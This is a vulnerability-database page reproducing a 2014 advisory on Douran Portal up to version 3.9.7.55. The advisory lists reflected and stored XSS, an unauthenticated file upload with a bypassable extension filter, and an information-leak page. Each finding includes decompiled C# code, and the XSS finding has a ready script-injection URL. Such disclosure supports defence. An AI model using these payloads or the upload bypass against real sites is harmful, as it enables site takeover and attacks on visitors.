Lucene search
+L

douran portal <= 3.9.7.55 - Multiple Vulnerabilities

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 9 Views

Douran Portal V3.9.7.55 Multiple Vulnerabilitie

Code

                                                ===========================================================
[+] Douran Portal &#60;= V3.9.7.55 Multiple Remote Vulnerabilities
===========================================================
[+] Author : ItSecTeam
[+] Contact : [email protected]
[+] Site : www.itsecteam.com
[+] Forum : http://forum.itsecteam.com/
[+] Thanks : Amin Shokohi (Pejvak!) , homay
~~~~~~~~~~~~~~~~[Information]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Web App : Douran Portal
[+] Version : Worked In Last Version (V3.9.7.55) And Prior
[+] Software: http://www.douran.com
[+][+][+][+][+][+][+](Vulnerabilities)[+][+][+][+][=][+][+]

[1] Xss None Present :
[~] Poc :
Douran.dll:DouranPortal.DesktopModules.OrderForm
private void Page_Load(object sender, EventArgs e)
{
    this.lblTitle.Text = Localize.GetString(&#34;ORDER_FOR&#34;, &#34;Order form for&#34;)
+ &#34; &#34; + base.Request.QueryString[&#34;ItemTitle&#34;];
}
Print Request.QueryString[&#34;ItemTitle&#34;] Without Check
[~] Secure :
private void Page_Load(object sender, EventArgs e)
{
    this.lblTitle.Text = Localize.GetString(&#34;ORDER_FOR&#34;, &#34;Order form for&#34;)
+ &#34; &#34; + CheckString(base.Request.QueryString[&#34;ItemTitle&#34;]);
}
[-] End Poc
[#] Exploit :
http://Site.Com/DesktopModules/Gallery/OrderForm.aspx?itemtitle=&#60;script&#62;alert(&#39;ITSecTeam&#39;)&#60;/script&#62;


[2] Remote File Upload :
[Note] : Worked In Older 3.8.2.2
[~] Poc :
You Can Upload Your File Without Check Authorization
You Can Upload :
string acceptedFiles =
&#34;;.jpg;.jpeg;.jpe;.gif;.bmp;.png;.swf;.avi;.ra;.mov;.mpeg;.mpg;.wav;&#34;;
You Can Bypass
[-] End Poc
[#] Exploit :http://Site.Com/DesktopModules/ftb/ftb.imagegallery.aspx[*]


[3] Information Leakage Show Device Info :
http://Site.Com/security/DeviceInfo.aspx

[4] Xss Present :
http://Site.Com/security/DeviceInfo.aspx
[~] Poc :
Douran.dll:DouranPortal.DesktopModules.BlogDB
Submit Data Without Check{
blogDB.AddBlogComment(ModuleID, ItemID,
this.txtName.Text,this.txtTitle.Text, this.txtURL.Text,
this.txtComments.Text);
}
public void AddBlogComment(int moduleID, int itemID, string name, string
title, string url, string comment)
{
    if (name.Length &#60; 1)
    {
        name = &#34;unknown&#34;;
    }
    if (title.Length &#62; 100)
    {
        title = title.Substring(0, 100);
    }
    if (name.Length &#62; 100)
    {
        name = name.Substring(0, 100);
    }
    if (url.Length &#62; 200)
    {
        url = url.Substring(0, 200);
    }
    SqlConnection sqlConnectionString = PortalSettings.SqlConnectionString;
    SqlCommand command = new SqlCommand(&#34;dp_BlogCommentAdd&#34;,
sqlConnectionString);
    command.CommandType = CommandType.StoredProcedure;
    SqlParameter parameter = new SqlParameter(&#34;@ModuleID&#34;, SqlDbType.Int, 4);
    parameter.Value = moduleID;
    command.Parameters.Add(parameter);
    SqlParameter parameter2 = new SqlParameter(&#34;@ItemID&#34;, SqlDbType.Int, 4);
    parameter2.Value = itemID;
    command.Parameters.Add(parameter2);
    SqlParameter parameter3 = new SqlParameter(&#34;@Name&#34;,
SqlDbType.NVarChar, 100);
    parameter3.Value = name;
    command.Parameters.Add(parameter3);
    SqlParameter parameter4 = new SqlParameter(&#34;@Title&#34;,
SqlDbType.NVarChar, 100);
    parameter4.Value = title;
    command.Parameters.Add(parameter4);
    SqlParameter parameter5 = new SqlParameter(&#34;@URL&#34;, SqlDbType.NVarChar,
200);
    parameter5.Value = url;
    command.Parameters.Add(parameter5);
    SqlParameter parameter6 = new SqlParameter(&#34;@Comment&#34;, SqlDbType.NText);
    parameter6.Value = comment;
    command.Parameters.Add(parameter6);
    sqlConnectionString.Open();
    command.ExecuteNonQuery();
    sqlConnectionString.Close();}
	[-] End Poc
[#] Exploit :http://Site.Com/DesktopModules/Blog/BlogView.aspx
[-][-][-][-][-][-][-](Vulnerabilities)[-][-][-][-][-][-][-]

~~~~~~~~~~~~~~~~[Vulnerabilities]~~~~~~~~~~~~~~~~~~~~~~~~~~~~


                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
9